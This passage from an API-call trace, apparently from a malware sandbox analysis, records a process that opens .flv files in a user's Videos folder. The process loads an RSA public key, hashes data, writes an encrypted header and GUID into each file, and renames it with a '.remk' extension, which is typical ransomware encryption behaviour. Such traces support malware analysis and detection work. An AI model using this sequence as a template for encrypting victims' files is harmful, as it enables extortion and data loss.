Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0237.944] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0237.944] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0237.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0237.944] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0237.944] GetLastError () returned 0x0 [0237.944] CryptDestroyHash (hHash=0x31de170) returned 1 [0237.944] CryptReleaseContext (hProv=0x694fd0, dwFlags=0x0) returned 1 [0237.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0237.944] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0237.944] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0237.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0237.944] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0237.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0237.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0237.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8bc0) returned 0x37cf820 [0237.945] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0237.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0237.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0237.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0237.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0237.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0237.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf5b8 [0237.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca98 [0237.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf600 [0237.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcab0 [0237.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcae0 [0237.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcb40 [0237.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcaf8 [0237.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0237.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0237.945] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0237.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0237.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcae0 | out: hHeap=0x630000) returned 1 [0237.946] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcaf8 | out: hHeap=0x630000) returned 1 [0237.946] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb40 | out: hHeap=0x630000) returned 1 [0237.946] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0237.946] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0237.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcb40 [0237.946] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x8bb5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.946] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0237.947] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0237.947] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.947] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0237.947] CloseHandle (hObject=0x640) returned 1 [0237.950] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\ZCC-nq6c5y\\S Vy53\\iCzLPFif.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\zcc-nq6c5y\\s vy53\\iczlpfif.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\ZCC-nq6c5y\\S Vy53\\iCzLPFif.flv.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\zcc-nq6c5y\\s vy53\\iczlpfif.flv.remk")) returned 1 [0237.951] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0237.951] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0237.952] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0237.953] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea008530, ftCreationTime.dwHighDateTime=0x1d5e809, ftLastAccessTime.dwLowDateTime=0xf6565d80, ftLastAccessTime.dwHighDateTime=0x1d5d80c, ftLastWriteTime.dwLowDateTime=0xf6565d80, ftLastWriteTime.dwHighDateTime=0x1d5d80c, nFileSizeHigh=0x0, nFileSizeLow=0x24ab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KqR1qrw6aoyjKfrEgvI.flv", cAlternateFileName="KQR1QR~1.FLV")) returned 1 [0237.953] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\ZCC-nq6c5y\\S Vy53\\KqR1qrw6aoyjKfrEgvI.flv") returned=".flv" [0237.953] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\ZCC-nq6c5y\\S Vy53\\KqR1qrw6aoyjKfrEgvI.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\zcc-nq6c5y\\s vy53\\kqr1qrw6aoyjkfregvi.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0237.954] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=9387) returned 1 [0237.954] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0237.957] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x2485, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.957] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0237.959] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0237.959] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x24ab, lpOverlapped=0x0) returned 1 [0237.960] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.960] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.960] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.960] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694fd0) returned 1 [0237.961] CryptCreateHash (in: hProv=0x694fd0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0237.961] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0237.961] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0237.961] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0237.961] GetLastError () returned 0x0 [0237.961] CryptDestroyHash (hHash=0x31de170) returned 1 [0237.961] CryptReleaseContext (hProv=0x694fd0, dwFlags=0x0) returned 1 [0237.961] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0237.961] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0237.961] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0237.962] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0237.962] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0237.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0237.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24b0) returned 0x37c8278 [0237.962] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0237.962] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0237.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0237.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0237.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0237.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0237.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf600 [0237.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcab0 [0237.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf648 [0237.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcac8 [0237.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcaf8 [0237.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcb58 [0237.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcb10 [0237.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0237.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0237.963] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0237.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0237.963] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcaf8 | out: hHeap=0x630000) returned 1 [0237.963] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb10 | out: hHeap=0x630000) returned 1 [0237.963] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb58 | out: hHeap=0x630000) returned 1 [0237.963] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0237.963] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0237.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcb58 [0237.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0237.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bcb10 [0237.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0237.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bcaf8 [0237.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0237.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0237.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0237.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0237.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0237.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0237.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0237.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0237.963] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0237.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb10 | out: hHeap=0x630000) returned 1 [0237.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0237.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcaf8 | out: hHeap=0x630000) returned 1 [0237.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0237.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0237.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb58 | out: hHeap=0x630000) returned 1 [0237.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0237.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0237.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0237.964] GetCurrentThreadId () returned 0x314 [0237.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0237.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c70a0 [0237.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0237.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694fd0 [0237.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0237.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0237.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0237.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0237.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.964] GetCurrentThreadId () returned 0x314 [0237.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.965] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x72aea0 [0237.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.965] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.965] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.965] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0237.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x72aea0 [0237.965] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0237.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0237.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0237.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x319bc40 [0237.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0237.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcb58 [0237.965] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0237.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0237.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0237.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0237.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0237.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0237.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0237.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0237.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcaf8 [0237.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0237.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0237.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0237.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0237.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0237.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0237.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0237.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcb10 [0237.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0237.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0237.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0237.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcae0 [0237.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0237.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcb70 [0237.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0237.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0237.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0237.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcb40 [0237.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0237.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcb28 [0237.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0237.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bcb88 [0237.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb28 | out: hHeap=0x630000) returned 1 [0237.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bcb28 [0237.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb40 | out: hHeap=0x630000) returned 1 [0237.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0237.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0237.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0237.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0237.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0237.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcaf8 | out: hHeap=0x630000) returned 1 [0237.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcaf8 [0237.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0237.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0237.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb58 | out: hHeap=0x630000) returned 1 [0237.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0237.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb88 | out: hHeap=0x630000) returned 1 [0237.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37b5b70 [0237.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0237.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x31b6580 [0237.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0237.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0237.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcaf8 | out: hHeap=0x630000) returned 1 [0237.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5d88 [0237.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0237.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0237.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0237.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694fd0 | out: hHeap=0x630000) returned 1 [0237.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0237.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0237.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: 